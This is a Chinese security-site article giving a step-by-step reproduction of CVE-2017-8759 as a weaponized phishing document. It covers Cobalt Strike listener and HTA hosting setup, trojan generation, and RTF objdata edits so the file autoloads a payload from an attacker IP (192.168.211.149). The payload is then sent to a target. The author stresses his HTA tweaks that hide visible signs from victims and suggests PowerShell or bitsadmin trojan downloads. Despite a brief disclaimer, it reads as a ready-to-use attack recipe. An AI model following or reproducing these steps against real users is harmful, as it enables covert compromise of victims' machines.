freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2017-8759完美复现(另附加hta+powershell弹框闪烁解决方案)
2017-09-19 08:00:19

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

*本文原创作者 Lz1y,本位属于 FreeBuf 原创奖励计划,禁止转载

CVE-2017-8759 是前几天出的 0 DAY ,搜了下,国内几乎没有人复现,这个洞总体来说,危害很大,而且比CVE-2017-0199 更难防御。

漏洞成因分析:

360:一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警

FireEye:FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

本人尝试了下复现,的确有很多坑!国外的大牛们也没有把利用方式说的很完善。

利用的文件:

本人整理的:

https://github.com/Lz1y/CVE-2017-8759

文件分别来自:

https://github.com/Voulnet/CVE-2017-8759-Exploit-sample

https://github.com/vysec/CVE-2017-8759

这次的攻击文件:cmd.hta exploit.txt  blob.bin

PS:cmd.hta中嵌入了VBS脚本,可以根据自己的需求更改内容(可以使用powershell直接下载并运行木马,也可以使用Windows中的bitsadmin下载木马运行)

我整理的HTA文件已经处理过啦~不会有HTA的白色闪烁,以及powershell的蓝色弹框。本机测试完全无任何怀疑点

然后将cmd.hta改名为cmd.jpg,并且修改当中的http://192.168.211.149:80为你的攻击IP

将exploit.txt中的的URL同样修改成你的IP

利用工具:Cobal Strike,Office 2013,C32

选择Cobal Strike的原因是,因为这个漏洞需要搭建web服务,而Cobal Strike丰富的钓鱼模块正好满足了我们的需求

漏洞利用过程

首先,打开Cobal Strike

打开一个Listener(Cobal Strike = > Listener => add

添加一个HTTPS的监听器,端口为443

然后Attacks=>Web Drive-by=> HOST file

CVE-2017-8759完美复现

切记Mime设置为HTA,Launch

接着再来一次Attacks=>Web Drive-by=> HOST file

CVE-2017-8759完美复现

接下来生成木马 Attacks=>Web Drive-by=> Script Web Delivery

CVE-2017-8759完美复现

点击Attacks=>Web Drive-by=> mange

查看当前的web页面~

CVE-2017-8759完美复现

接下来就是制作钓鱼文档

打开office,本人装的是win7,所以是office2013.不过这个洞跟office版本没啥关系,在WPS中用户如果双击了图块,也是会造成漏洞的。

CVE-2017-8759完美复现

插入对象

设置如下

CVE-2017-8759完美复现 

点击确定。另存为Doc3.rtf。注意!!!是rtf格式!!!不然后面步骤会失败!!!!!!

使用编辑器打开Doc3.rtf。找到{\object\objautlink\rsltpict\objw4321\objh4321{\*\objdata 

这一部分,修改为{\object\objupdate\objautlink\rsltpict\objw4321\objh4321

可以让文档自动加载payload~

然后C32打开blob.bin找到以下这一区

CVE-2017-8759完美复现

修改十六进制部分,改为http://{攻击IP}/exploit.txt

我就改成http://192.168.211.149/exploit.txt

然后全选,反键拷贝为HEX格式化

替换Doc3.rtf中的

CVE-2017-8759完美复现

替换掉objdata一直到}{\result 中间的所有十六进制数据

然后保存,这样子攻击文档就制作好了~

接下来将文档发送给目标

目标点击后

CVE-2017-8759完美复现

无需点击是否

CVE-2017-8759完美复现


得到了session~

因为修改了HTA部分,所以是不存在弹框闪烁的问题(可能会被杀软检测到),目前这个0day影响还是很大的。没有打补丁的小伙伴记得修复哦~

动图(无弹框):

CVE-2017-8759完美复现

参考来源:

#Blog:http://www.Lz1y.cn

#Team: Cola-Lab

*本文原创作者 Lz1y,本位属于 FreeBuf 原创奖励计划,禁止转载

本文作者:, 属于FreeBuf原创奖励计划,未经许可禁止转载

# CVE-2017-8759完美复现
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑